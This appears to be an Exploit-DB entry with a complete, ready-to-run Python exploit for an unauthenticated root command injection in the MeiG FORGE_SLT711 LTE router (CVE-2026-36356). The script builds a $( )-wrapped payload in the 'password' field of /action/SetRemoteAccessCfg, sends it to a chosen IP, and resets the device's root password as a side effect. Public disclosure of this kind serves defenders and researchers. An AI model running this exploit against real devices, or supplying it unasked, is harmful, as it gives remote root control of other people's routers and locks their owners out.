MeiG Smart FORGE_SLT711 - OS Command Injection

EDB-ID:

52581




Platform:

Linux

Date:

2026-05-27


# Exploit Title: MeiG Smart FORGE_SLT711 - OS Command Injection
# Date: 2026-05-03
# Exploit Author: Daniil Gordeev
# Vendor Homepage: http://www.meigsmart.com
# Software Link: N/A (firmware distributed via carrier channels)
# Version: Firmware MDM9607.LE.1.0-00110-STD.PROD-1 (likely all firmware versions of this product line)
# Tested on: MeiG FORGE_SLT711 (Ortel 4G LTE CPE), Qualcomm MDM9607, Linux 3.18.48
# CVE: CVE-2026-36356
"""
Unauthenticated RCE — MeiG FORGE_SLT711 (Ortel 4G LTE CPE)
GoAhead /action/SetRemoteAccessCfg OS command injection

Vuln:  JSON "password" field → sprintf("echo root:\"%s\"|chpasswd") → system()
Auth:  None (endpoint missing from route.txt auth list)
Root:  Commands execute as uid=0(root)
Type:  Blind — output not in HTTP response, use --cmd "cmd > /tmp/out" to exfil
Note:  The sink is a chpasswd line, so every request also resets root's password
       to whatever the injected $(...) prints on stdout (empty when the command
       is redirected to a file) — chpasswd's handling of an empty password was
       not checked here; expect the device's root password to change.

Discovered: 2026-02-21
Tested on:  FW MDM9607.LE.1.0-00110-STD.PROD-1
"""

import argparse
import json
import sys
import urllib.request
import urllib.error

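def _build_payload(cmd: str) -> bytes:
    """Return the JSON request body carrying *cmd* in the ``password`` field.

    The command is wrapped in ``$( )`` so the device's shell expands it inside
    the double-quoted argument the firmware builds (see module docstring).
    ``json.dumps`` escapes any ``"`` in *cmd* for transport; the device's JSON
    parser is expected to unescape it again before the sprintf.
    """
    return json.dumps({"password": f"$({cmd})"}).encode()


def _response_ok(body: str) -> bool:
    """Return True iff *body* is a JSON object whose ``retcode`` equals 0.

    Anything else (non-JSON, a JSON array, missing/non-zero retcode) is False.
    ``retcode`` 0 is taken as "endpoint accepted the request"; whether it also
    reflects the injected command's own exit status cannot be told from here.
    """
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return False
    if not isinstance(data, dict):
        return False
    return data.get("retcode") == 0


def exploit(ip: str, cmd: str, port: int = 80, timeout: int = 10) -> bool:
    """POST the injection payload to ``/action/SetRemoteAccessCfg`` on *ip*.

    Args:
        ip: Target host.
        cmd: Shell command to run as root on the device. Output is not
            returned (blind); redirect it to a file to retrieve it later.
        port: HTTP port of the GoAhead server (default 80).
        timeout: Socket timeout in seconds for the single request.

    Returns:
        True when the device answered with ``retcode`` 0, False on any HTTP
        error, connection failure, unparsable body or non-zero retcode.
        Never raises for network/parse problems; failures are printed.

    Side effect: per the vulnerable sink, the password field also becomes
    root's new password (the stdout of *cmd*), so this is not a read-only probe.
    """
    url = f"http://{ip}:{port}/action/SetRemoteAccessCfg"

    req = urllib.request.Request(
        url,
        data=_build_payload(cmd),
        headers={"Content-Type": "application/json"},
        method="POST",
    )

    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            # errors="replace": a non-UTF-8 body should be reported, not crash.
            body = resp.read().decode(errors="replace")
    except urllib.error.HTTPError as e:
        # HTTPError is a URLError subclass; report the status rather than
        # mislabelling a 4xx/5xx as a connection problem.
        print(f"[-] HTTP {e.code} from target: {e.reason}")
        return False
    except urllib.error.URLError as e:
        print(f"[-] Connection failed: {e}")
        return False
    except OSError as e:
        # Raw socket errors (e.g. timeouts surfacing outside URLError).
        print(f"[-] Error: {e}")
        return False

    if _response_ok(body):
        print("[+] retcode:0 — command executed as root")
        return True
    print(f"[-] Unexpected response: {body}")
    return False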

def main() -> None:
    """CLI entry point: parse arguments, send one payload, exit 0/1.

    Exit status is 0 when ``exploit`` reports ``retcode`` 0 and 1 otherwise,
    so the script can be chained from shell. Remember the injected command is
    blind: redirect its output to a file on the device to read it later.
    """
    parser = argparse.ArgumentParser(
        description="MeiG SLT711 GoAhead unauthenticated RCE (blind)",
        epilog="Example: %(prog)s --ip 192.168.1.1 --cmd 'id > /tmp/out'",
    )
    parser.add_argument("--ip", default="192.168.1.1", help="Target IP (default: 192.168.1.1)")
    parser.add_argument("--port", type=int, default=80, help="Target port (default: 80)")
    parser.add_argument("--cmd", required=True, help="Command to execute as root (blind, no output returned)")
    parser.add_argument("--timeout", type=int, default=10, help="HTTP timeout in seconds (default: 10)")
    opts = parser.parse_args()

    # Banner: the third line is literal text showing the injection template.
    banner = (
        f"[*] Target:  {opts.ip}:{opts.port}",
        f"[*] Command: {opts.cmd}",
        "[*] Payload: $({cmd}) inside password field",
    )
    for line in banner:
        print(line)

    succeeded = exploit(opts.ip, opts.cmd, opts.port, opts.timeout)
    sys.exit(0 if succeeded else 1)

# Only run the exploit when executed as a script, not when imported for reuse.
if __name__ == "__main__":
    main()